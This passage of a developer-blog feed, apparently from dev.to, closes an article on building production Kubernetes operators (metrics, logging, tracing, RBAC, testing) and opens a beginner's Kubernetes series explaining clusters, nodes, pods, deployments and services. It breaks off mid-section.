    &lt;span class="n"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"myoperator_databases_provisioning"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;Help&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"Number of databases currently in provisioning state"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
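<p>Custom collectors must be registered with controller-runtime's registry so they are exposed on the same &lt;code&gt;/metrics&lt;/code&gt; endpoint as the built-in metrics:</p>

```go
import (
	"sigs.k8s.io/controller-runtime/pkg/metrics"
)

func init() {
	// metrics.Registry is the Prometheus registry served by the
	// manager's metrics endpoint; MustRegister panics on duplicates,
	// which surfaces copy-paste registration bugs at startup.
	metrics.Registry.MustRegister(databasesProvisioning)
}
```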



&lt;h3&gt;
  
  
  Structured Logging
&lt;/h3&gt;

&lt;p&gt;Use structured logging (logr interface) with consistent fields:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;log&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FromContext&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WithValues&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="s"&gt;"database"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s"&gt;"generation"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Generation&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s"&gt;"phase"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Phase&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Starting reconciliation"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Tracing
&lt;/h3&gt;

&lt;p&gt;For complex operators with many API calls, distributed tracing (OpenTelemetry) provides invaluable insight into where time is spent during reconciliation.&lt;/p&gt;
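<p>A minimal sketch of wrapping an expensive reconciliation step in an OpenTelemetry span; the tracer name, span name, and helper function are illustrative, and this assumes a tracer provider has already been configured at startup:</p>

```go
import "go.opentelemetry.io/otel"

func (r *Reconciler) provision(ctx context.Context, db *myv1.Database) error {
	// Start a child span; API calls made with this ctx by
	// instrumented clients are attributed to it.
	ctx, span := otel.Tracer("my-operator").Start(ctx, "Reconciler.provision")
	defer span.End()

	return r.createStatefulSet(ctx, db)
}
```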

&lt;h3&gt;
  
  
  Common Debugging Commands
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Watch reconciler output in real time&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-n&lt;/span&gt; operator-system deploy/my-operator &lt;span class="nt"&gt;-f&lt;/span&gt; | jq &lt;span class="s1"&gt;'.'&lt;/span&gt;

&lt;span class="c"&gt;# Inspect the CRD resource including status&lt;/span&gt;
kubectl get database mydb &lt;span class="nt"&gt;-o&lt;/span&gt; yaml

&lt;span class="c"&gt;# Check events for a custom resource&lt;/span&gt;
kubectl describe database mydb

&lt;span class="c"&gt;# Force a reconcile by touching the annotation&lt;/span&gt;
kubectl annotate database mydb force-reconcile&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%s&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="nt"&gt;--overwrite&lt;/span&gt;

&lt;span class="c"&gt;# Check lease for leader election&lt;/span&gt;
kubectl get lease &lt;span class="nt"&gt;-n&lt;/span&gt; operator-system
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;







&lt;h2&gt;
  
  
  Production Considerations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Resource Management
&lt;/h3&gt;

&lt;p&gt;Always set resource requests and limits on your operator pod. An operator without limits can starve other workloads during a reconciliation storm.&lt;/p&gt;

&lt;h3&gt;
  
  
  RBAC Least Privilege
&lt;/h3&gt;

&lt;p&gt;Your operator's ServiceAccount should only have the permissions it actually needs. A common mistake is granting &lt;code&gt;cluster-admin&lt;/code&gt; for convenience. Use the Kubebuilder RBAC markers to generate precise RBAC manifests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;//+kubebuilder:rbac:groups=mycompany.io,resources=databases,verbs=get;list;watch;create;update;patch;delete&lt;/span&gt;
&lt;span class="c"&gt;//+kubebuilder:rbac:groups=mycompany.io,resources=databases/status,verbs=get;update;patch&lt;/span&gt;
&lt;span class="c"&gt;//+kubebuilder:rbac:groups=apps,resources=statefulsets,verbs=get;list;watch;create;update;patch;delete&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Graceful Shutdown
&lt;/h3&gt;

&lt;p&gt;Handle &lt;code&gt;SIGTERM&lt;/code&gt; gracefully. The controller-runtime manager's &lt;code&gt;Start&lt;/code&gt; function blocks until context cancellation, at which point it stops all controllers and waits for in-flight reconciliations to complete (up to a timeout). Make sure your reconciler respects context cancellation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Reconciler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c"&gt;// Check context at expensive checkpoints&lt;/span&gt;
    &lt;span class="k"&gt;select&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;-&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Err&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;default&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c"&gt;// ... reconcile logic&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Testing Strategy
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpc9ixsnt8u824fm19au.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpc9ixsnt8u824fm19au.png" alt="image" width="800" height="242"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Use &lt;code&gt;envtest&lt;/code&gt; (from controller-runtime) for integration tests. It spins up a real etcd and API server, installs your CRDs, and lets you test full reconciliation loops without a cluster. This is your most valuable testing layer.&lt;/p&gt;
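<p>A minimal &lt;code&gt;envtest&lt;/code&gt; harness looks roughly like this; the CRD path is illustrative, and &lt;code&gt;setup-envtest&lt;/code&gt; must have installed the control-plane binaries beforehand:</p>

```go
import (
	"path/filepath"

	"sigs.k8s.io/controller-runtime/pkg/client"
	"sigs.k8s.io/controller-runtime/pkg/envtest"
)

func startTestEnv() (*envtest.Environment, client.Client, error) {
	testEnv := &envtest.Environment{
		// Install the operator's CRDs into the test API server.
		CRDDirectoryPaths: []string{filepath.Join("..", "config", "crd", "bases")},
	}

	cfg, err := testEnv.Start() // boots a local etcd + kube-apiserver
	if err != nil {
		return nil, nil, err
	}

	c, err := client.New(cfg, client.Options{})
	if err != nil {
		_ = testEnv.Stop()
		return nil, nil, err
	}
	// Caller is responsible for testEnv.Stop() during teardown.
	return testEnv, c, nil
}
```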

&lt;h3&gt;
  
  
  Upgrade Considerations
&lt;/h3&gt;

&lt;p&gt;When upgrading your operator, consider:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CRD schema changes&lt;/strong&gt;: Adding fields is safe. Removing or renaming fields is breaking. Use conversion webhooks for major schema evolution.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Controller logic changes&lt;/strong&gt;: New reconciler behavior applied to existing resources — think through the transition. Add a migration annotation or one-time migration job if needed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;State machine transitions&lt;/strong&gt;: If you're adding new phases to your state machine, ensure existing resources in "old" phases are handled by the updated controller.&lt;/li&gt;
&lt;/ul&gt;





&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Kubernetes Operators are one of the most powerful extension mechanisms ever built into a distributed system platform. But that power comes with complexity. The controller runtime, informers, work queues, rate limiters, finalizers, and webhooks form a sophisticated machinery that, once understood, enables you to build remarkably robust automation.&lt;/p&gt;

&lt;p&gt;The key mental models to internalize:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level-triggered reconciliation&lt;/strong&gt; — always reconcile toward desired state, don't just react to events. This gives you resilience for free.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The cache is your friend&lt;/strong&gt; — reads from cache, writes to API. This is the performance contract the entire system is designed around.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Idempotency is not optional&lt;/strong&gt; — your reconciler will be called many times for the same state. Design it accordingly from day one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Status is a contract&lt;/strong&gt; — &lt;code&gt;observedGeneration&lt;/code&gt;, conditions with reasons and messages, precise phase transitions. This is how your operator communicates with the world.&lt;/p&gt;
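
&lt;p&gt;As a concrete illustration, a status block following these conventions looks something like this (the values are illustrative):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;status:
  observedGeneration: 4          # equals metadata.generation when status is current
  phase: Ready
  conditions:
  - type: Ready
    status: "True"
    reason: ReconcileSucceeded
    message: All child resources are available
    lastTransitionTime: "2026-04-01T12:00:00Z"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;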

&lt;p&gt;The operators you build are, in a very real sense, pieces of software that will run 24/7, autonomously managing production infrastructure. Treat them with the same rigor you'd apply to any production-critical system: test thoroughly, observe everything, and design for failure.&lt;/p&gt;





&lt;h2&gt;
  
  
  Ready to Build Your Own Operator?
&lt;/h2&gt;

&lt;p&gt;If you want to go from zero to production-ready Kubernetes operators with hands-on practice, check out the &lt;strong&gt;&lt;a href="https://github.com/piyushjajoo/k8s-operators-course" rel="noopener noreferrer"&gt;Kubernetes Operators Course&lt;/a&gt;&lt;/strong&gt; — a practical, end-to-end course that walks you through building operators from the basics all the way to production-grade patterns. It's a great companion to the internals covered in this post.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Found a bug or inaccuracy? The beauty of operators — and this blog post — is that there's always room for a reconciliation loop.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>devops</category>
      <category>sre</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Kubernetes for Beginners: A Multi-Part Series</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Mon, 23 Feb 2026 02:45:19 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/kubernetes-for-beginners-a-multi-part-series-53op</link>
      <guid>https://dev.to/piyushjajoo/kubernetes-for-beginners-a-multi-part-series-53op</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Who is this for?&lt;/strong&gt; Someone who has never touched Kubernetes but wants to understand it well enough to discuss it confidently — and even run a few things on their laptop.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important mindset note:&lt;/strong&gt; Kubernetes is &lt;em&gt;not&lt;/em&gt; Heroku or a full application platform. It does not build your app, manage your CI/CD pipeline, or automatically apply production best practices. It is an &lt;strong&gt;orchestration system&lt;/strong&gt; — a very powerful one — but you still have to bring your own containers, configuration, security posture, and operational practices. Think of it as an incredibly capable infrastructure layer, not a magic button.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Part 1 — What Problem Does Kubernetes Solve?&lt;/li&gt;
&lt;li&gt;Part 2 — Core Concepts: The Kubernetes Vocabulary&lt;/li&gt;
&lt;li&gt;Part 3 — The Architecture: How It All Fits Together&lt;/li&gt;
&lt;li&gt;Part 4 — Hands-On: Your First Kubernetes App&lt;/li&gt;
&lt;li&gt;Part 5 — Deployments, Scaling, and Self-Healing&lt;/li&gt;
&lt;li&gt;Part 6 — Networking: Services and How Apps Talk to Each Other&lt;/li&gt;
&lt;li&gt;Part 7 — Configuration and Secrets&lt;/li&gt;
&lt;li&gt;Part 8 — Storage: Keeping Data Alive&lt;/li&gt;
&lt;li&gt;Part 9 — Observability: Knowing What's Going On&lt;/li&gt;
&lt;li&gt;Part 10 — Putting It All Together: The Big Picture&lt;/li&gt;
&lt;li&gt;Appendix — Common Beginner Mistakes&lt;/li&gt;
&lt;/ul&gt;





&lt;h2&gt;
  
  
  Part 1 — What Problem Does Kubernetes Solve?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The World Before Kubernetes
&lt;/h3&gt;

&lt;p&gt;Imagine you've built a web app. It runs on a single server. Life is simple. But then:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Traffic spikes — your server buckles.&lt;/li&gt;
&lt;li&gt;A new version breaks everything — you have downtime.&lt;/li&gt;
&lt;li&gt;Your server crashes at 2am — the app is down until someone wakes up.&lt;/li&gt;
&lt;li&gt;You need to run 10 copies of the app — you SSH into 10 machines manually.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the problem Kubernetes was built to solve.&lt;/p&gt;

&lt;h3&gt;
  
  
  Containers First
&lt;/h3&gt;

&lt;p&gt;Before Kubernetes, you need containers. A &lt;strong&gt;container&lt;/strong&gt; is a lightweight, self-contained package that includes your app and everything it needs to run (libraries, runtime, config). Think of it as a shipping container: standardized, portable, stackable.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🐳 &lt;strong&gt;Docker&lt;/strong&gt; popularized containers. If you haven't already, install Docker Desktop or an alternative like Podman:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.docker.com/products/docker-desktop/" rel="noopener noreferrer"&gt;Docker Desktop&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://podman-desktop.io/" rel="noopener noreferrer"&gt;Podman Desktop&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  So What Is Kubernetes?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes&lt;/strong&gt; (often abbreviated as &lt;strong&gt;K8s&lt;/strong&gt; — 8 letters between K and s) is an open-source system for &lt;em&gt;automating deployment, scaling, and management of containerized applications&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;In plain English: Kubernetes is the &lt;strong&gt;conductor of an orchestra of containers&lt;/strong&gt;. You declare &lt;em&gt;what&lt;/em&gt; you want running, and it figures out &lt;em&gt;how&lt;/em&gt; to make it happen and continuously keeps it that way.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr1yzwwwl9dfsq1m2lxd0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr1yzwwwl9dfsq1m2lxd0.png" alt="image" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Promises of Kubernetes
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Promise&lt;/th&gt;
&lt;th&gt;What it means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-healing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Crashed containers are restarted automatically&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scaling&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Add or remove instances based on load&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rolling updates&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Deploy new versions with zero downtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Service discovery&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Apps find each other without hardcoded IPs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Load balancing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Traffic is spread across healthy instances&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What Kubernetes Does NOT Solve (Out of the Box)
&lt;/h3&gt;

&lt;p&gt;This is important to know upfront so you're not surprised later:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gap&lt;/th&gt;
&lt;th&gt;What fills it&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD pipelines&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Jenkins, GitHub Actions, ArgoCD, Tekton&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Container image security scanning&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Trivy, Snyk, Harbor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Secret rotation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HashiCorp Vault, Sealed Secrets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Observability by default&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;You add Prometheus, Grafana, Loki yourself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Multi-region failover&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Cluster federation, multi-cluster tools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;App building/packaging&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Helm, Kustomize, your own Dockerfile&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  A Note on History
&lt;/h3&gt;

&lt;p&gt;Kubernetes was created by Google (based on their internal system called Borg) and open-sourced in 2014. It's now maintained by the &lt;strong&gt;Cloud Native Computing Foundation (CNCF)&lt;/strong&gt; and is the de facto standard for container orchestration.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Version awareness:&lt;/strong&gt; Kubernetes releases 3 minor versions per year (e.g., v1.28, v1.29, v1.30). APIs and behaviors can change between versions. Always check the &lt;a href="https://kubernetes.io/releases/" rel="noopener noreferrer"&gt;Kubernetes changelog&lt;/a&gt; and verify compatibility with your cluster's version.&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Part 2 — Core Concepts: The Kubernetes Vocabulary
&lt;/h2&gt;

&lt;p&gt;One reason Kubernetes feels intimidating is the terminology. Let's demystify the key terms with real-world analogies.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kubernetes Is a Declarative, Desired-State System
&lt;/h3&gt;

&lt;p&gt;This is the most important idea in the whole series. In Kubernetes, you don't issue commands like "start this container now." Instead, you describe what you &lt;em&gt;want&lt;/em&gt; to exist, and Kubernetes continuously works to make reality match that description.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Declarative:&lt;/strong&gt; "I want 3 copies of my app running."&lt;br&gt;
&lt;strong&gt;Imperative:&lt;/strong&gt; "Start container 1. Start container 2. Start container 3."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Kubernetes is always declarative. Your YAML files express desired state. The system stores that desired state and reconciles it with reality forever.&lt;/p&gt;
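
&lt;p&gt;To make the contrast concrete, here are both styles with &lt;code&gt;kubectl&lt;/code&gt; (a sketch — &lt;code&gt;my-app&lt;/code&gt; is a placeholder Deployment name):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Imperative: tell the cluster what to DO right now&lt;/span&gt;
kubectl scale deployment my-app --replicas=3

&lt;span class="c"&gt;# Declarative: set replicas: 3 in deployment.yaml, then submit&lt;/span&gt;
&lt;span class="c"&gt;# the desired state and let Kubernetes reconcile toward it&lt;/span&gt;
kubectl apply -f deployment.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;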

&lt;h3&gt;
  
  
  The Cluster
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;cluster&lt;/strong&gt; is the entire Kubernetes environment — the collection of machines that Kubernetes manages together as one system.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr7sj7ask04ujftujbedj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr7sj7ask04ujftujbedj.png" alt="image" width="800" height="154"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Nodes
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;node&lt;/strong&gt; is an individual machine (physical or virtual) in the cluster. There are two types:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Control Plane node&lt;/strong&gt; — the brain. It makes decisions about the cluster and stores desired state.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Worker nodes&lt;/strong&gt; — where your actual application containers run.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; If the cluster is a restaurant, the control plane is the kitchen manager who tracks all the orders, and worker nodes are the individual chefs who actually cook.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Pods
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;Pod&lt;/strong&gt; is the smallest deployable unit in Kubernetes. A Pod wraps one or more containers that should always run together and share the same network and storage.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; If a container is a single fish, a Pod is the fish tank. Usually one fish per tank, but sometimes a few that need to live together.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsducxhu2eopjddwu383.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsducxhu2eopjddwu383.png" alt="image" width="800" height="163"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key facts about Pods:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pods are &lt;strong&gt;ephemeral&lt;/strong&gt; — they can be killed and replaced at any time.&lt;/li&gt;
&lt;li&gt;Each Pod gets its own IP address inside the cluster's internal network. That IP is &lt;strong&gt;not routable outside the cluster&lt;/strong&gt; and &lt;strong&gt;changes every time the Pod is rescheduled&lt;/strong&gt;. Never hardcode a Pod IP.&lt;/li&gt;
&lt;li&gt;You rarely create Pods directly — you use higher-level abstractions like Deployments.&lt;/li&gt;
&lt;/ul&gt;
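
&lt;p&gt;You can see these ephemeral IPs yourself on a running cluster:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# -o wide adds the Pod IP and node columns.&lt;/span&gt;
&lt;span class="c"&gt;# Delete a Deployment-managed Pod and run this again: the&lt;/span&gt;
&lt;span class="c"&gt;# replacement comes back with a different name and IP.&lt;/span&gt;
kubectl get pods -o wide
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;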

&lt;h3&gt;
  
  
  Deployments
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;Deployment&lt;/strong&gt; tells Kubernetes: &lt;em&gt;"I want X copies of this Pod running at all times, and here's how to roll out changes safely."&lt;/em&gt; It manages the full lifecycle of Pods — creating them, replacing crashed ones, and orchestrating updates.&lt;/p&gt;

&lt;h3&gt;
  
  
  Services
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;Service&lt;/strong&gt; gives Pods a stable network identity. Since Pods die and get new IPs constantly, a Service acts as a consistent entry point that routes traffic to healthy Pods matching a label selector.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; A Service is like a restaurant's phone number. The chefs (Pods) might change, but you always call the same number.&lt;/p&gt;
&lt;/blockquote&gt;
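
&lt;p&gt;A minimal Service manifest looks like this (the name is illustrative; the selector must match your Pods' labels):&lt;/p&gt;

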